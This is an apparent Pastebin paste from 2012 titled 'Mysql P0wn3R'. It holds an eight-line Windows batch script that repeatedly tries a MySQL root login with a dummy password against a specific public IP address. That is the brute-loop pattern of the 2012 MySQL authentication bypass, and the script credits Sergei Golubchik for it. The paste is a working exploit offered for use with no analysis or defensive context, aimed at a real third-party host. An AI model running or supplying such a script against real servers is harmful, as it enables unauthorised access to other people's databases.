Advertisement
Neo-Craft

Mysql P0wn3R

Jun 15th, 2012
377
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.19 KB | None | 0 0
  1. REM By Neo-Craft Exploit Sergei Golubchik
  2. @echo off
  3. title Mysql Injector
  4. cd C:\wamp\bin\mysql\mysql5.5.16\bin
  5. :loop
  6. mysql -u root mysql --password=blah -h 178.33.41.239
  7. goto loop
  8. PAUSE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement